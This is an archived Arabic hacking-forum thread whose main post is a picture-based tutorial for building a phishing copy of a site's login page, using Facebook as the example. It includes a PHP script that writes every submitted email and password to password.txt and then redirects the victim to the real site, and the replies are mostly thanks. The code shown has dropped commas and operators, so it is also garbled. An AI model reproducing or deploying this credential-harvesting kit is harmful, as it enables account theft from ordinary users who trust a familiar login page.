:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم الـبـريد الإلـكتروني والحسابات العامة (http://www.vbspiders.com/vb/f195.html)
-   -   حصريا و بالصور شرح برمجه صفحه مزوره لاي موقع تريده (http://www.vbspiders.com/vb/t44348.html)

SoLiTair4Ever 03-10-2011 04:51 AM

حصريا و بالصور شرح برمجه صفحه مزوره لاي موقع تريده
 
1 مرفق
http://ahmedreda89.googlepages.com/Salam2.png

)(SoLiTair4Ever)(
)(بالصور شرح برمجه صفحه مزوره لاي موقع تريده)(
http://up.2sw2r.com/upfiles/4oU58212.png
قمت بنقل بعض الخطوات من درس الاخ فولكانو لانه ليس لدي الوقت لكتابتها فالساعة الآن الثانية و النصف بعد منتصف الليل

http://up.2sw2r.com/upfiles/4oU58212.png


كيف تعمل صفحه مزوره للموقع الي براسك


اولا مستلزمات الصفحات المزوره


1- الموقع المطلوب تزوير صفحه الدخول فيه

2- توفير مساحه لرفع الصفحه المزوره عليها


وهذه المساحه يمكن ان تكون استضافه مجانيه او مدفوعه او على شل



نشرح على موقع الفيس بوك

وطبعا نفس الخطوات على موقع هوتميل وياهو ما في فرق

http://up.2sw2r.com/upfiles/4oU58212.png

الخطوات


1- ادخل موقع فيس بوك أو الموقع المراد تزويره

http://up.2sw2r.com/upfiles/4oU58212.png
http://img859.imageshack.us/img859/2959/66736864.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

بعدين ادخل على SAVE AS..


او
اضغط

ctrl+s

http://up.2sw2r.com/upfiles/4oU58212.png
http://img225.imageshack.us/img225/337/41504295.jpg
http://up.2sw2r.com/upfiles/4oU58212.png
ثم

http://up.2sw2r.com/upfiles/4oU58212.png
http://img859.imageshack.us/img859/3823/66835563.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

نروح للمسار اللي قمنا بحفظ الملف فيه
و نفتح الاندكس بالناوت باد ++
لتحميل البرنامج من هنا
محرر اكواد متطور لمرمجي و مطوري المواقع Notepad++

http://up.2sw2r.com/upfiles/4oU58212.png
http://img684.imageshack.us/img684/960/60544087.jpg

http://up.2sw2r.com/upfiles/4oU58212.png

اوك رح تطلع معاك يا حلو صفحه مليانه اكواد Html
بدنا نبحث عن كلمه عشان نبحث نضغط
ctrl+F
الان عنا طلع مربع البحث نكتب بداخله


action
http://up.2sw2r.com/upfiles/4oU58212.png
http://img853.imageshack.us/img853/852/42774351.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

اوك زي ما انت شايف

رقم 1 ==> نكتب action

رقم 2 ==> نحول ما بين رمز" " post الى get
واذا كانت GET ما ضل عليك تساوي فيها اشي

رقم 3 ==> نتيجة البحث اللي كتبناه في الرقم واحد

رقم 4 ==> نحول رابط التسجيل هذا الطويل الي بالصوره ما بين رمز" " الى vbspiders.php وخليك زاكر هذا الاسم وارك وراك رح نشرحه


فتصبح النتيجة

http://up.2sw2r.com/upfiles/4oU58212.png
http://img857.imageshack.us/img857/280/92724590.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

اوك


الان نحفط الصفحه


الان صار عنا صفحه مزوره تمام كمال






رح نعمل ملف

vbspiders.php

http://up.2sw2r.com/upfiles/4oU58212.png
http://img101.imageshack.us/img101/3904/22174707.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

هذا الملف الثاني الي عنا بالتزوير


شو وظيفته


وظيفته هو الي بدو يرسل المعلومات من الصفحه المزوره للصفحه الي فيها التبليغ


يعني لو حد فتح الفيس بوك للصفحه المزوره تاعتك رح يجيك التالي


هو يكتب ايميله وباسويرده بالصفحه المزوره


يجي ملف


vbspiders.php


يرسل الايميل والباسويرد للصفحه التبليغ



اوك افهما المبدا بس ما اعرفنا شو هو هذا الملف


بكل بساطه



افتح مفكره


انسخ فيها التالي


مع تعديل ما يلزم

ملاحظة : لا تحذف المحدد بالاصفر في الصورة

كود PHP:

<?php  

/* By SoLiTair4Ever   wWw.VbSpiders.CoM  */

$handle fopen("password.txt""a"); //<== ضع اسم الملف اللي يوصلك عليه التبليغ

foreach($_GET as $variable => $value) { 

fwrite($handle$variable); 

fwrite($handle"="); 

fwrite($handle$value); 

fwrite($handle"\r\n");

$redirect "www.facebook.com";  //<== ضع رابط الصفحة المراد تزويرها

header("Location:$redirect "); 



fwrite($handle"\r\n"); 

fclose($handle); 

exit; 

?>

http://up.2sw2r.com/upfiles/4oU58212.png
http://img859.imageshack.us/img859/2457/72367282.jpg
http://up.2sw2r.com/upfiles/4oU58212.png

رقم 1 ==> اسم الملف اللي راح يوصلنا عليه البسووورد انا سميتها password.txt
رقم 2 ==>ضع رابط الصفحة المراد تزويرها


http://up.2sw2r.com/upfiles/4oU58212.png

ننشئ صفحة يصلنا فيها التبليغ

رح نعمل ملف تكست و سميه مثل الاسم اللي حطيتو في الكود
انا كنت سميتو
password.txt في صفحة vbspiders.php

و نحفظه بدون ما نكتب فيه شيئ

مش صعبه بدهاش معجزه,,.!!

http://img855.imageshack.us/img855/5803/57198544.jpg
http://up.2sw2r.com/upfiles/4oU58212.png


آسف نسيت خطوة

نغير اسم صفهتنا الى index.htm


كما في الصورة

http://up.2sw2r.com/upfiles/4oU58212.png
http://img847.imageshack.us/img847/5192/27023511.jpg
http://up.2sw2r.com/upfiles/4oU58212.png


وهيك بصير معانا 3 ملفات + مجلد صور

http://up.2sw2r.com/upfiles/4oU58212.png

http://up.2sw2r.com/upfiles/4oU58212.png
لتحميل الصور في حال فقدانها من المرفقات او من هــــنــــــــــــــا

+

تقييم ان افدتكم بشيئ
تحيــــــاتي

)(SoLiTair4Ever)(


Demonic 03-10-2011 08:15 AM

(: Mercii

Demonic 03-10-2011 08:59 AM

اخر خطوة ما فهمتها كيف يعني ارفعها على استضافتي ؟ 0.o

SoLiTair4Ever 03-10-2011 01:03 PM

35 مشاهدة و واحد فقط بيحط كلمت شكرا
لهذا السبب ليست هناك شروحات كثيرة للمبتدئين
خلوني اتشجع اشوي

اقتباس:

اخر خطوة ما فهمتها كيف يعني ارفعها على استضافتي ؟ 0.o

راح انزل شرح رفع صفحة مزورة
على استضافة مجانية
او
على شل

لكن ليس مع هذا التفاعل

J0kEr HaCkEr 03-10-2011 01:53 PM

لالالالالالالالالا تزعل

و ربي إنك مبدع بصراحة ابداع * ابداع من سيد المبدعين

عساااك على القوة يا كفو

واااصل بدوووون فواصل

تقبل مروري و تحياتي لشخصك الكريم

SoLiTair4Ever 03-10-2011 01:59 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة مجروح هكر (المشاركة 310328)
لالالالالالالالالا تزعل

و ربي إنك مبدع بصراحة ابداع * ابداع من سيد المبدعين

عساااك على القوة يا كفو

واااصل بدوووون فواصل

تقبل مروري و تحياتي لشخصك الكريم

1/ مشكور حبيبي على المرور
لي الشرف


2/ كما يقول المثل الجزائري
ما يحس بالجمرة غير اللي كوته
يعني ما يحس بتعب الشرح الا اللي سوى شرح من قبل
و تشوف الناس تقرأ و تروح
ما طلبت منهم شيئ
كلمة شكرا تكفيني

SoLiTair4Ever 03-12-2011 03:49 PM

تم تعديل الصور

NeTCaT-Ma 03-12-2011 08:33 PM

هه شكرا لك اخي
أحلى تقييم لأحلى سوليتير في العالم
تسلم لي

NA NA 03-12-2011 08:41 PM

مشكووور وما قصرت

SoLiTair4Ever 03-12-2011 09:01 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة NA NA (المشاركة 311031)
مشكووور وما قصرت

تسلم حبيبي

MO3ETH 03-13-2011 05:47 AM

VERY GOOOOOOOOOOOOOOOD

المخترق الصغير 03-13-2011 01:41 PM

مشكور حبيبي على الشرح الرائع

لك مني اجمل تحية

SoLiTair4Ever 03-13-2011 03:20 PM

و لكم مني اجمل تحية كمان

المفترس 03-13-2011 03:56 PM

thanks my friend

SoLiTair4Ever 03-13-2011 09:29 PM

De RiEn


الساعة الآن 10:16 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0